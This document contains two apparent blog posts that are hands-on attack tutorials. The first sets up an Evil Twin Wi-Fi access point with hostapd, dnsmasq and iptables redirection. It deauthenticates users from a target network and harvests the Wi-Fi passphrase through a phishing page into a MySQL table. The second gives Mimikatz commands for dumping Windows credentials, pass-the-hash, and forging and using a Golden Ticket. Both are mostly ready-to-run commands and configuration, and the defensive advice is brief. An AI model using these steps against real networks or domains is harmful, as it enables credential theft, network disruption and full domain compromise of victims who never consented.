December 01, 2019

Hacking WPA2 Wi-Fi password using Evil Twin Attack | DNSMASQ and Hostapd


Wireless protocols have drastically evolved since 2003 after the invention of WPA in terms of secured Wi-Fi access. These days, wireless networks have become a part of our daily life. Almost every home, business, corporate sectors, stores, industries, and institutions have their personal Wireless AP (Access Point).  Moreover, to make the internet free to every individual, some organizations have established public open Wi-Fi APs in almost every public place, like airports, railway stations, libraries, bus terminals, etc. But when the question comes about security, even after implementing the best security practices available, wireless network will always be less secure than wired network, just like David Bernstein once said, “FOR EVERY LOCK, THERE IS SOMEONE OUT THERE TRYING TO PICK IT OR BREAK IT”.

An Evil Twin is like a rogue Wi-Fi AP (Access Point), where an attacker creates a fake AP to lure the users into thinking it is a trusted wireless network. The attacker amplifies the signal in a way that the victim automatically connects to the rogue AP because of its faster beaconing and strong range.

Practical Scenario: The logic behind an Evil Twin attack is so simple, you just have to create a fake access point with the same name of the targeted Wi-Fi. Then you need to create a webpage to show the victim that he needs to enter the password to access the internet and store it in a database.



Prerequisites: Below is a list of hardware and software used in this article. You can use any hardware as long as it is compatible with the software you will be using.


Hardware Used:
-          A Laptop (4gb RAM, Intel i5 processor)
-          USB Wireless TP-LINK Adapter – 150MBPS (TP-Link WN722N)
-          Wi-Fi dongle for internet connection / Ethernet with internet connectivity

Software Used:
-          VMWare workstation 14
-          Kali Linux 2019.2 OS
-          Airmon-ng, Airodump-ng, Airplay-ng
-          Dnsmasq
-          Iptables
-          Apache2
-          Mysql
-          Hostapd

Note:
Hostapd: It is used to create a fake targeted access point, be it WEP, WPA, WPA2 personal or enterprise secured. It should work.
Dnsmasq: It is used to resolve DNS  requests from/to a host. It can also act as a DHCP server.
Apache: It acts as a web-server to the victim. It will basically host the phishing webpage in the attacker’s system.
Mysql: It is used to store the credentials in the database, entered from the website.
Iptables: It is a firewall, used for the Linux based systems.

Step 1: Setup Environment
Update the operating system and install required packages.
-          sudo apt-get install update
-          sudo apt-get install dnsmasq hostapd apache2

Step 2: Configuration of NetworkManager
Before starting monitor mode, make sure your NetworkManager and airmon-ng don’t conflict with each other.

Open the configuration file of the NetworkManager and put the MAC address of the device that you want your NetworkManager to stop managing.
-          gedit /etc/NetworkManager/NetworkManager.conf

Now add the lines mentioned below at the end of the file:
-           [keyfile]
unmanaged-devices:mac=AA:BB:CC:DD:EE:FF, A2:B2:C2:D2:E2:F2

Note:
Please change  AA:BB:CC:DD:EE:FF(eth0) and A2:B2:C2:D2:E2:F2(wlan0) with your respective MAC Addresses.

Step 3:  Setup Wireless Interface
Find the wireless interface using iwconfig command. In my case it is wlan0:
-          iwconfig

Put the wireless interface in monitor mode using ‘airmon-ng’. A new interface will be created, in this case it is wlan0mon.
-          airmon-ng start wlan0


Now it’s time to start monitoring all the AIR packets using ‘airodump-ng’.
-          airodump-ng wlan0mon



In this case, I will target CH 9. Please note the target details.


-          BSSID: It is used to describe sections of a wireless local area network or WLAN. It recognizes the access point or router because it has a unique address that creates the wireless network.
-          CH (Channel number): It is the medium through which our wireless networks can send and receive data.
-          ESSID: It is an electronic marker or identifier that serves as an identification and address for your computer, or network device to connect to a wireless router or access point and then access the internet.

(Optional Step): Set tx-power of Wi-Fi card to max: 1000mW to set the best range
-          ifconfig wlan0mon down     # Bring down the interface
-          iw reg set US              # Set region to be US
-          ifconfig wlan0mon up       # Bring the interface up
-          iwconfig wlan0mon          # Check tx-power, should be 30dBm

       tx-power stands for transmission power. By default it is set to 20dBm (Decibel metre) or 100mW.
       tx-power in mW increases 10 times with every 10 dBm. See the dBm to mW table.
If your country is set to US (United State) during installation,.your card should operate on 30 dBm (1000 mW)

Step 4: Setup Fake Access point

First of all, create a directory called “fakeap” under /root/fakeap.

-          mkdir /root/fakeap
-          cd /root/fakeap
Now create a new hostapd configuration file here and paste the below code inside it.
-          gedit hostapd.conf
Code:
interface=wlan0mon
driver=nl80211
ssid=[Fake AP Name] //Take it from the airodump-ng result
hw_mode=g
channel=[Fake AP Channel] //Take it from the airodump-ng result
macaddr_acl=0
ignore_broadcast_ssid=0

Note:
interface: Monitor mode Wireless Interface to use.
ssid: Fake Access Point ESSID (name).
channel: Fake AP Channel to operate on.

Next we just have to execute the .conf file using the below command and our rogue access point will be up and running.
-          hostapd hostapd.conf

Step 5: Set up DHCP
We will use dnsmasq to set up DHCP in the attacker machine. Dnsmasq with the support of forwarder is certainly fast and easy to modify and execute.
Open the terminal and create a configuration file for dnsmasq and paste the below code in it.
-          Gedit dnsmasq.conf
Code
interface=wlan0mon
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1
Note:
dhcp-range: IP Range for network clients. 12h is the lease time.
dhcp-option=3: Gateway IP for the networks.
dhcp-option=6: DNS Server.
listen-address: Bind DHCP to local IP.

Next you have to create the network gateway and assign netmask to the interface and add it in the routing table.
-          ifconfig wlan0mon up 192.168.1.1 netmask 255.255.255.0
-          route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
Now, let’s start the dnsmasq server.

Step6: Enable NAT by setting Firewall rules in iptables and set port forwarding
Enter the following commands to set-up NAT
-          iptables –flush
-          iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE

-          iptables --append FORWARD --in-interface wlan0mon -j ACCEPT
-          iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.1:80
-          iptables -t nat -A POSTROUTING -j MASQUERADE

Now we will setup the port forwarding.
-          echo 1 > /proc/sys/net/ipv4/ip_forward

Step 7: Setup Phishing Site

We need a phishing site like forged document or falsified page, where the user will be lured to enter the passphrase which will be stored in the attacker database.

You can create your own web application but let’s just download from the below link for now.
Extract the .zip file in /root/fakeap/rogueap.
-          unzip rogueap.zip
Next move the content of rogueap/ to /var/www/html directory. Before that don’t forget to clean the content of /var/www/html.
-          rm -rf /var/www/html/*
-          mv root/fakeap/rogueap/* /var/www/html/
Step 8: Setup Apache server and Mysql database
We need a webserver to host the phishing website in the attacker’s machine. Please execute the below command to start the apache2 server.
-          service apache2 start
So we have our phishing web application ready. Now we  require a database to store the passwords  the victim will type and submit.
Open Mysql and execute the below commands.
-          service mysql start
-          mysql
-          mysql> create database rogueap;
-          mysql> create user rogueuser;
-          mysql> grant all on rogueap.* to 'rogueuser'@'localhost' identified by 'roguepassword';
-          mysql> use rogueap;
-          mysql> create table wpa_keys(password1 varchar(30), password2 varchar(30));
-          mysql> ALTER DATABASE rogueap CHARACTER SET 'utf8';
Note: Don’t change any values in the above mentioned queries and inside /var/www/html/dbconnect.php, because this is where the credentials are defined. If you change any value of the database configuration you have to modify everywhere.

Step 9: DNS spoof and De-authentication
Now, just redirect the traffic to the Gateway IP of our forged network using dnsspoof.
-          dnsspoof -i wlan0mon
Finally, to make the targeted Wi-Fi down we will use airplay-ng, which will deauthenticate every user from the targeted Wi-Fi and make it unavailable by sending high number of requests from our machine. That will force the victim to connect to our rogue access point.
Please execute the below command in the terminal window to de-authenticate the target.
-          aireplay-ng -00 -a AA:BB:CC:DD:EE:FF wlan0mon
-          Note: AA:BB:CC:DD:EE:FF, is the targeted Wi-Fi’s BSSID, you can get it from the result of airodump-ng.
Now, you just have to wait for the victim to connect with the Wi-Fi and visit any website, it will redirect to the phishing website.


The moment the victim enters the password it will be stored in our mysql database. To check the password, please execute the below query in mysql.
-          mysql> select * from wpa_keys;

The password is: p@ssword123
So that’s it. That is how you can create an Evil Twin and steal the password from the targeted Wi-Fi.
Defending Against an Evil Twin Attack
-          The best way to defend against the Evil Twin attack is to know about the tactic so that you can understand in which situation it should be taken as suspicious.

-          The moment you feel you abruptly disconnected from your trusted network and suddenly see an open wireless network with the same name of your trusted AP, you should take it as an abnormal incident.

-          It is recommended to never connect to an open Wi-Fi network, especially those who do not have encrypted communication.

-          If you see the router is updating, you can turn your Wi-Fi off and connect it via LAN to know what is going on.

- For validation purposes, you can connect with the open network from a restricted environment (sandbox) and check if it is asking for any credentials, put in any random credentials and see the response.


July 24, 2019

Mimikatz: Credential harvest, Pass the hash, Golden Ticket


Mimikatz is a tool, built in C language and used to perform password harvesting in windows platform. It is very well known to extract clean text passwords, hash, PIN code, Kerberos tickets from memory and those credentials can then be used to perform lateral movement and access restricted information.

We can have two more optional components of mimikatz. One is called mimidrv, which is a driver to interact with windows kernel and another one is called mimilib, which is used to bypass AppLocker. Auth package/SSP, password filter, and sekurlsa for WinDBG. 

Mimikatz needs administrator or SYSTEM priviledge to get debug rights in order to do certain actions and connect with the LSASS process.

Relation between LSASS and MIMIKATZ:

LSASS.exe also known as Local Security Authority Subsystem Service which is responsible for giving Single Sign On features in windows, where an already logged-in user is not required authenticate every time whenever wants to access any resources. LSASS provides access not only to the authenticated users credentials but also to the open session credentials which is already running since the last boot. Mimikatz exploits this credential cache of LSASS service and provide the credential reports to the attackers in various formats.

Execution of Mimikatz:

In term of basic objective of Mimikatz, we can retrieve clear text password by using the commands “debug” and asking for the passwords. 

  • priviledge::debug 
  • sekurlsa::logonpassword
Mimikatz needs admin privilege in order to get the LSA (Local Security Authority) information. If it will run as standard user the LSA will return errors, and that way it will become useless.

Mimikatz returns different set of results in term of version of the Windows it is executed on. For example if we run the Mimikatz in XP, and the unpatched versions of Windows 7 and 8 we will not only retrieve the SIDs, usernames and domain details but also the passwords in clear text. Please find the below screenshot for your reference.



But from the beginning of the Windows 8.1 LSASS no longer stores cleartext passwords inside the memory. Similarly Windows 10 and Windows server 2012R2 provide null information in the password fields for wdigest and Kerberos providers.



Pass the hash with mimikatz:

From the above figure we got that plaintext password is no longer available in the LSASS memory, but no worries still we can retrieve the NTLM hash. Mimikatz allows to run a process as another user by using the retrieved hashes. The attacker authenticates the process to the local system by using the local user’s password hashes. This is known as pass the hash attack, where instead of following the time consuming process like crack the password from the NTLM hashes, it can directly pass the hash and allow us to access resources remotely using another user privilege. 

To pass the hash follow the below commands,

#sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash> /run:<command>



In the above commands reflects as opening a new command window on the respective local machine with the hash of the another domain user name as “ShortUser”. 

The moment command prompt is popped up from the remote system a connection will be buildto a network recource on DC1. For confirmation we can use “net use” command in the command prompt followed by the <network share>.

C:\> net use \\dc1\fshare 



To view the user connection to the shared resource follow the below command



Golden Ticket Attack:

The previous attack is all about pass the NTLM hash of a valid user to get an existing session. Where Golden Ticket attack is one step ahead, where it will convince the target system that an invalid session is valid and get the access to it.

A Kerberos implemented Windows system trusts a Kerberos ticket only when it is signed by the hash of a ticket granting ticket. If the attacker somehow manages to get the NTLM hash of the Kerberos TGT account that can be used to signed any ticket of this system other than the legitimate one.

Mimikatz can be used here to get the krbtgt NTLM hash and generate ‘Golden Ticket’ and that can be used to give privilege to any session from any system. To create a Golden ticket the below four informations are must require.
  •        An administrator username. (if unavailable, any privileged user will be fine)
  •       The FQDN (Fully Qualified Domain Name)
  •       The SID of the domain 
  •       The NTLM hash of the krbtgt account
So we can get the above details by following the below ways.

        1)       The username can be anything existing or non-exiting but the chances of getting a valid session will be more with the existing username.
      
        2)       We can get a FQDL by executing “ipconfig /all



3            3)       We can also get the domain SID by executing “whoami /user” command.



We can get the first three information from any system but for getting the krbtgt NTLM hash the attacker must get it from the Domain Controller. For this Mimikatz can be used to obtain the krbtgt NTLM hash using “lsadump::lsa /inject /name:krbtgt”.



With the above four information now we can proceed and create the Golden Ticket from any system by executing the below command in Mimikatz.

Mimikatz # kerberos::golden /user:<username> /domain:<domainname> /SID:<SID> /krbtgt: <krbtgt NTLM hash> /groups:501,502,512,513,518,519,520 /ticket:<ticketname.tck>

After execution of the above command the ticket will be generated with name of the /ticket parameter and the validity of the ticket will be ten years for long term data exfiltration activity.



Now for using the Golden Ticket we will use this from a elevated command prompt window and execute “Kerberos::ptt” (pass-the-ticket) command.



If we closely observe the above sceenshot then will find that first of all we have tried to connect the administrative share on \\DC1 but failed, and then applied a Mimikatz session with a Golden ticket, And right after that the access is granted.

I hope you have enjoyed reading this write-ups about Mimikatz, please let me know if you have any queries/feedback in the comment section. We will meet again in my next blog. Happy hacking!!